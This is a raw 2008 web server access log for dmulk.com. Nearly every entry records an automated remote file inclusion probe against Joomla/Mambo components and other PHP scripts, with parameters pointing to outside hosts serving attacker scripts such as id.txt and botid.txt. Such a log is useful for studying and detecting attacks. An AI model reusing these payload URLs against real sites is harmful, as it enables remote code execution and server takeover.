211.160.79.6 - - [22/Sep/2008:09:44:19 -0700] "GET /logs/access_080720.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:44:20 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:44:24 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [22/Sep/2008:09:44:25 -0700] "GET //includes/header.php?c_temp_path=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
59.126.46.141 - - [22/Sep/2008:09:44:26 -0700] "GET /logs//includes/header.php?c_temp_path=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
59.126.46.141 - - [22/Sep/2008:09:44:27 -0700] "GET /logs/access_080107.log//includes/header.php?c_temp_path=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:44:37 -0700] "GET /logs/access_080319.log//ImpExData.php?systempath=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:45:07 -0700] "GET /index2.php?DoAction=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:45:07 -0700] "GET /logs/access_080905.log/index2.php?DoAction=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:45:07 -0700] "GET /logs/index2.php?DoAction=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:45:08 -0700] "GET /logs/access_080604.log/index2.php?DoAction=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:45:13 -0700] "GET //administrator/index.php?option=com_expose&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:45:17 -0700] "GET /logs/access_080910.log/index2.php?url_page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:45:17 -0700] "GET /index2.php?url_page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:45:17 -0700] "GET /logs/index2.php?url_page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:45:19 -0700] "GET /logs/access_080507.log/index2.php?url_page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:45:36 -0700] "GET /logs/access_080824.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:45:40 -0700] "GET /logs/access_080815.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:45:40 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:50 -0700] "GET /logs/access_080127.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:50 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:51 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:51 -0700] "GET /logs/access_080219.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:58 -0700] "GET /logs/access_080127.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:59 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:45:59 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:46:00 -0700] "GET /logs/access_080219.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.25.165.195 - - [22/Sep/2008:09:46:00 -0700] "GET /logs/index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:46:01 -0700] "GET /logs/access_080519.log//COMPONENTS/COM_SECURITYIMAGES/CONFIGINSERT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:46:01 -0700] "GET //COMPONENTS/COM_SECURITYIMAGES/CONFIGINSERT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:46:02 -0700] "GET /logs//COMPONENTS/COM_SECURITYIMAGES/CONFIGINSERT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.81.176.13 - - [22/Sep/2008:09:46:10 -0700] "GET /logs/access_080428.log HTTP/1.1" 200 3369449 "-" "wvnwbrgd7 ohxb lpwmqyloqXxceue7ws" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:46:17 -0700] "GET /logs/access_080804.log/index2.php?DoAction=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:46:22 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:46:22 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:46:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:46:27 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.238.228 - - [22/Sep/2008:09:46:29 -0700] "GET /logs/access_080816.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:46:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:46:31 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:46:35 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:46:49 -0700] "GET /logs/access_080516.log//COMPONENTS/COM_SECURITYIMAGES/CONFIGINSERT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:47:04 -0700] "GET //errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:08 -0700] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:08 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:09 -0700] "GET /logs/access_080303.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:47:10 -0700] "GET /logs/access_080707.log/index2.php?url_page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:47:12 -0700] "GET /logs/access_080910.log/index2.php?ID=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:47:12 -0700] "GET /logs/index2.php?ID=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:47:12 -0700] "GET /index2.php?ID=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:47:16 -0700] "GET /logs/access_080428.log/index2.php?ID=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:42 -0700] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:42 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:43 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:47:47 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:47:51 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:52 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:47:54 -0700] "GET //COMPONENTS/COM_SECURITYIMAGES/CONFIGINSERT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:47:57 -0700] "GET /logs//administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:47:57 -0700] "GET //administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:09:48:40 -0700] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:48:44 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:48:46 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 200 95077 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:48:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:48:56 -0700] "GET /extras/ext_cats.php?dir_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:48:56 -0700] "GET /logs/access_080219.log/extras/ext_cats.php?dir_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:48:56 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:49:03 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:49:07 -0700] "GET /logs/access_080820.log/index1.php?dat=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:49:07 -0700] "GET /index1.php?dat=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:49:07 -0700] "GET /logs/index1.php?dat=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:49:10 -0700] "GET /logs/access_080619.log/index1.php?dat=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.218.59 - - [22/Sep/2008:09:49:18 -0700] "GET /logs/access_080825.log//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:49:19 -0700] "GET /logs/access_080221.log/extras/ext_cats.php?dir_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:09:49:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:09:49:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:09:49:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:09:49:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:49:55 -0700] "GET /logs/access_080508.log/index1.php?dat=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:09:50:02 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:09:50:04 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94982 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:50:18 -0700] "GET /index1.php?site=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:50:18 -0700] "GET /logs/access_080719.log/index1.php?site=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:50:18 -0700] "GET /logs/index1.php?site=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:50:18 -0700] "GET /logs/access_080508.log/index1.php?site=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:50:31 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:50:31 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:50:31 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:50:33 -0700] "GET /logs//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:50:35 -0700] "GET /logs/access_080304.log//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:50:35 -0700] "GET /logs/access_080625.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:50:36 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:50:37 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 200 94948 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:50:38 -0700] "GET /logs/access_080711.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:50:39 -0700] "GET //sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:50:42 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:50:42 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:50:42 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:50:54 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:51:01 -0700] "GET /logs/access_080814.log//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:51:04 -0700] "GET /logs/access_080807.log//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:51:04 -0700] "GET /logs/access_080902.log///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:09:51:15 -0700] "GET /logs/access_080807.log/erors.php?error=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:09:51:15 -0700] "GET /erors.php?error=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:09:51:15 -0700] "GET /logs/erors.php?error=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.249.67.4 - - [22/Sep/2008:09:51:18 -0700] "GET /blog/index.php/category/motorcycles/page/2/?show=slide&nggpage=2 HTTP/1.1" 404 8108 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
62.149.238.228 - - [22/Sep/2008:09:51:19 -0700] "GET /logs/access_080905.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:52:01 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:52:23 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:52:23 -0700] "GET //modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:52:24 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:52:25 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
